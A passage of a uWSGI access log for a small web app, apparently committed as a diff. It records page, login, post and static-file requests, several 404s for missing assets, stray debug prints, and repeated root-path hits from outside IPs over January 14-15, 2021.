vars in 872 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2655/3614] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2656/3615] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2657/3616] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:44:16 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2658/3617] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:44:16 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2659/3618] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 13:44:21 2021] GET /all-9-0-0 => generated 10271 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +3 +[] +[pid: 15176|app: 0|req: 2660/3619] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 13:44:24 2021] GET /all-9-3-0 => generated 10271 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2661/3620] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 13:44:27 2021] GET /all-0-0-0 => generated 13507 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +3 +3 +3 +3 +3 +3 +3 +3 +3 +[, , , , , , , , ] +[pid: 15176|app: 0|req: 2662/3621] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 13:44:29 2021] GET /all-0-3-0 => generated 13507 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +2 +2 +2 +2 +2 +2 +2 +2 +2 +[] +[pid: 15176|app: 0|req: 2663/3622] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 13:44:31 2021] GET /all-0-2-0 => generated 9853 bytes in 26 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2664/3623] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 13:44:33 2021] GET /all-0-0-0 => generated 13507 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2665/3624] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 13:44:34 2021] GET /all-0-0-0 => generated 13507 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2666/3625] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 13:44:37 2021] GET /all-3-0-0 => generated 10249 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2667/3626] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 14:05:52 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2668/3627] 180.160.58.153 () {40 vars in 915 bytes} [Thu Jan 14 14:07:26 2021] GET /home/ => generated 11134 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3628] 180.160.58.153 () {40 vars in 900 bytes} [Thu Jan 14 14:07:26 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3629] 180.160.58.153 () {40 vars in 894 bytes} [Thu Jan 14 14:07:26 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3630] 180.160.58.153 () {40 vars in 896 bytes} [Thu Jan 14 14:07:26 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2669/3631] 180.160.58.153 () {40 vars in 919 bytes} [Thu Jan 14 14:07:33 2021] GET /all-0-0-0 => generated 13507 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3632] 180.160.58.153 () {40 vars in 928 bytes} [Thu Jan 14 14:07:33 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3633] 180.160.58.153 () {40 vars in 898 bytes} [Thu Jan 14 14:07:33 2021] GET /static/img/t_photo/16_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2670/3634] 180.160.58.153 () {40 vars in 923 bytes} [Thu Jan 14 14:07:53 2021] GET /single/4/ => generated 9939 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3635] 180.160.58.153 () {40 vars in 964 bytes} [Thu Jan 14 14:07:53 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2671/3636] 180.160.58.153 () {40 vars in 923 bytes} [Thu Jan 14 14:08:57 2021] GET /single/16 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2672/3637] 180.160.58.153 () {40 vars in 925 bytes} [Thu Jan 14 14:08:57 2021] GET /single/16/ => generated 9382 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +[] +[pid: 15176|app: 0|req: 2673/3638] 180.160.58.153 () {40 vars in 923 bytes} [Thu Jan 14 14:09:35 2021] GET /all-9-0-0 => generated 10271 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2674/3639] 180.160.58.153 () {40 vars in 921 bytes} [Thu Jan 14 14:09:43 2021] GET /publish/ => generated 5325 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2675/3640] 180.160.58.153 () {40 vars in 915 bytes} [Thu Jan 14 14:30:14 2021] GET /home/ => generated 11134 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3641] 180.160.58.153 () {40 vars in 885 bytes} [Thu Jan 14 14:30:14 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3642] 180.160.58.153 () {40 vars in 865 bytes} [Thu Jan 14 14:30:14 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3643] 180.160.58.153 () {40 vars in 867 bytes} [Thu Jan 14 14:30:14 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3644] 180.160.58.153 () {40 vars in 900 bytes} [Thu Jan 14 14:30:14 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3645] 180.160.58.153 () {40 vars in 894 bytes} [Thu Jan 14 14:30:14 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3646] 180.160.58.153 () {40 vars in 896 bytes} [Thu Jan 14 14:30:14 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2676/3647] 101.251.242.238 () {32 vars in 509 bytes} [Thu Jan 14 15:40:19 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2677/3648] 180.160.59.76 () {38 vars in 863 bytes} [Thu Jan 14 15:46:36 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3649] 180.160.59.76 () {40 vars in 863 bytes} [Thu Jan 14 15:46:36 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3650] 180.160.59.76 () {40 vars in 885 bytes} [Thu Jan 14 15:46:36 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3651] 180.160.59.76 () {40 vars in 867 bytes} [Thu Jan 14 15:46:36 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3652] 180.160.59.76 () {40 vars in 865 bytes} [Thu Jan 14 15:46:36 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3653] 180.160.59.76 () {40 vars in 871 bytes} [Thu Jan 14 15:46:36 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3654] 180.160.59.76 () {40 vars in 846 bytes} [Thu Jan 14 15:46:36 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3655] 180.160.59.76 () {40 vars in 844 bytes} [Thu Jan 14 15:46:36 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3656] 180.160.59.76 () {40 vars in 862 bytes} [Thu Jan 14 15:46:36 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3657] 180.160.59.76 () {40 vars in 860 bytes} [Thu Jan 14 15:46:36 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3658] 180.160.59.76 () {40 vars in 852 bytes} [Thu Jan 14 15:46:36 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3659] 180.160.59.76 () {40 vars in 906 bytes} [Thu Jan 14 15:46:37 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2678/3660] 180.160.59.76 () {48 vars in 1007 bytes} [Thu Jan 14 15:46:46 2021] POST /login/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2679/3661] 180.160.59.76 () {40 vars in 911 bytes} [Thu Jan 14 15:46:46 2021] GET /home/ => generated 11126 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3662] 180.160.59.76 () {40 vars in 899 bytes} [Thu Jan 14 15:46:46 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3663] 180.160.59.76 () {40 vars in 893 bytes} [Thu Jan 14 15:46:46 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3664] 180.160.59.76 () {40 vars in 895 bytes} [Thu Jan 14 15:46:46 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3665] 180.160.59.76 () {40 vars in 912 bytes} [Thu Jan 14 15:46:49 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2680/3666] 180.160.59.76 () {40 vars in 918 bytes} [Thu Jan 14 15:46:52 2021] GET /single/4/ => generated 9990 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3667] 180.160.59.76 () {40 vars in 863 bytes} [Thu Jan 14 15:46:52 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3668] 180.160.59.76 () {40 vars in 861 bytes} [Thu Jan 14 15:46:52 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3669] 180.160.59.76 () {40 vars in 963 bytes} [Thu Jan 14 15:46:52 2021] GET /static/img/r_photo/17_8E07F70B-BEB4-4A4D-8060-5CC144A1D456.gif => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2681/3670] 180.160.59.76 () {48 vars in 1016 bytes} [Thu Jan 14 15:46:57 2021] POST /single/4/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2682/3671] 180.160.59.76 () {40 vars in 922 bytes} [Thu Jan 14 15:46:57 2021] GET /single/4/ => generated 9440 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2683/3672] 180.160.59.76 () {48 vars in 1101 bytes} [Thu Jan 14 15:47:27 2021] POST /single/4/ => generated 0 bytes in 20 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2684/3673] 180.160.59.76 () {42 vars in 951 bytes} [Thu Jan 14 15:47:27 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2685/3674] 180.160.59.76 () {42 vars in 953 bytes} [Thu Jan 14 15:47:27 2021] GET /single/4/ => generated 9963 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3675] 180.160.59.76 () {40 vars in 897 bytes} [Thu Jan 14 15:47:28 2021] GET /static/img/t_photo/hungry.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2686/3676] 180.160.59.76 () {48 vars in 1016 bytes} [Thu Jan 14 15:47:34 2021] POST /single/4/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2687/3677] 180.160.59.76 () {40 vars in 922 bytes} [Thu Jan 14 15:47:34 2021] GET /single/4/ => generated 9440 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2688/3678] 180.160.59.76 () {42 vars in 953 bytes} [Thu Jan 14 15:52:51 2021] GET /single/4/ => generated 9440 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3679] 180.160.59.76 () {42 vars in 881 bytes} [Thu Jan 14 15:52:52 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2689/3680] 180.160.59.76 () {48 vars in 1101 bytes} [Thu Jan 14 15:53:03 2021] POST /single/4/ => generated 0 bytes in 22 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2690/3681] 180.160.59.76 () {42 vars in 951 bytes} [Thu Jan 14 15:53:03 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2691/3682] 180.160.59.76 () {42 vars in 953 bytes} [Thu Jan 14 15:53:03 2021] GET /single/4/ => generated 9896 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2692/3683] 180.160.59.76 () {48 vars in 1016 bytes} [Thu Jan 14 15:53:08 2021] POST /single/4/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2693/3684] 180.160.59.76 () {40 vars in 922 bytes} [Thu Jan 14 15:53:08 2021] GET /single/4/ => generated 9440 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2694/3685] 180.160.59.76 () {48 vars in 1101 bytes} [Thu Jan 14 15:53:19 2021] POST /single/4/ => generated 0 bytes in 20 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2695/3686] 180.160.59.76 () {42 vars in 951 bytes} [Thu Jan 14 15:53:20 2021] GET /single/4 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2696/3687] 180.160.59.76 () {42 vars in 953 bytes} [Thu Jan 14 15:53:20 2021] GET /single/4/ => generated 9898 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2697/3688] 180.160.59.76 () {48 vars in 1016 bytes} [Thu Jan 14 15:53:25 2021] POST /single/4/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2698/3689] 180.160.59.76 () {40 vars in 922 bytes} [Thu Jan 14 15:53:25 2021] GET /single/4/ => generated 9440 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2699/3690] 180.160.59.76 () {42 vars in 953 bytes} [Thu Jan 14 15:59:16 2021] GET /single/4/ => generated 9440 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3691] 180.160.59.76 () {42 vars in 881 bytes} [Thu Jan 14 15:59:16 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2700/3692] 180.160.59.76 () {48 vars in 1101 bytes} [Thu Jan 14 15:59:28 2021] POST /single/4/ => generated 0 bytes in 19 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2701/3693] 180.160.59.76 () {42 vars in 951 bytes} [Thu Jan 14 15:59:28 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2702/3694] 180.160.59.76 () {42 vars in 953 bytes} [Thu Jan 14 15:59:28 2021] GET /single/4/ => generated 9982 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2703/3695] 180.160.59.76 () {48 vars in 1016 bytes} [Thu Jan 14 15:59:33 2021] POST /single/4/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2704/3696] 180.160.59.76 () {40 vars in 922 bytes} [Thu Jan 14 15:59:33 2021] GET /single/4/ => generated 9440 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2705/3697] 180.160.59.76 () {48 vars in 1101 bytes} [Thu Jan 14 15:59:41 2021] POST /single/4/ => generated 0 bytes in 19 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2706/3698] 180.160.59.76 () {42 vars in 951 bytes} [Thu Jan 14 15:59:41 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2707/3699] 180.160.59.76 () {42 vars in 953 bytes} [Thu Jan 14 15:59:42 2021] GET /single/4/ => generated 9981 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2708/3700] 180.160.59.76 () {40 vars in 916 bytes} [Thu Jan 14 15:59:48 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2709/3701] 180.160.59.76 () {48 vars in 1007 bytes} [Thu Jan 14 15:59:59 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2710/3702] 180.160.59.76 () {40 vars in 911 bytes} [Thu Jan 14 15:59:59 2021] GET /home/ => generated 11125 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2711/3703] 180.160.59.76 () {40 vars in 918 bytes} [Thu Jan 14 16:00:02 2021] GET /single/4/ => generated 9979 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2712/3704] 180.160.59.76 () {48 vars in 1016 bytes} [Thu Jan 14 16:00:06 2021] POST /single/4/ => generated 27 bytes in 26 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2713/3705] 180.160.59.76 () {40 vars in 922 bytes} [Thu Jan 14 16:00:07 2021] GET /single/4/ => generated 9439 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2714/3706] 180.160.59.76 () {48 vars in 1099 bytes} [Thu Jan 14 16:00:40 2021] POST /single/4/ => generated 0 bytes in 30 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2715/3707] 180.160.59.76 () {42 vars in 951 bytes} [Thu Jan 14 16:00:41 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2716/3708] 180.160.59.76 () {42 vars in 953 bytes} [Thu Jan 14 16:00:41 2021] GET /single/4/ => generated 9978 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: / +[pid: 15176|app: 0|req: 2717/3709] 83.97.20.29 () {26 vars in 278 bytes} [Thu Jan 14 16:05:33 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2718/3710] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 16:44:37 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2719/3711] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 17:25:10 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2720/3712] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 18:01:09 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2721/3713] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 18:40:36 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2722/3714] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 19:16:02 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2723/3715] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 19:20:19 2021] GET / => generated 3429 bytes in 11 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2724/3716] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 19:56:51 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 15176|app: 0|req: 2725/3717] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 20:31:12 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 15176|app: 0|req: 2726/3718] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 21:11:19 2021] GET / => generated 3429 bytes in 23 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 15176|app: 0|req: 2727/3719] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 21:50:18 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2728/3720] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 22:30:12 2021] GET / => generated 3429 bytes in 9 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2729/3721] 167.248.133.55 () {24 vars in 258 bytes} [Thu Jan 14 22:33:42 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2730/3722] 167.248.133.55 () {30 vars in 393 bytes} [Thu Jan 14 22:33:42 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2731/3723] 83.97.20.25 () {26 vars in 279 bytes} [Thu Jan 14 22:39:05 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2732/3724] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 23:10:32 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: / +[pid: 15176|app: 0|req: 2733/3725] 83.97.20.29 () {26 vars in 278 bytes} [Thu Jan 14 23:48:36 2021] GET / => generated 3429 bytes in 10 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /login.com +[pid: 15176|app: 0|req: 2734/3726] 219.228.146.176 () {38 vars in 766 bytes} [Fri Jan 15 00:16:44 2021] GET /login.com => generated 3474 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2735/3727] 219.228.146.176 () {38 vars in 758 bytes} [Fri Jan 15 00:16:48 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2736/3728] 219.228.146.176 () {38 vars in 760 bytes} [Fri Jan 15 00:16:48 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: 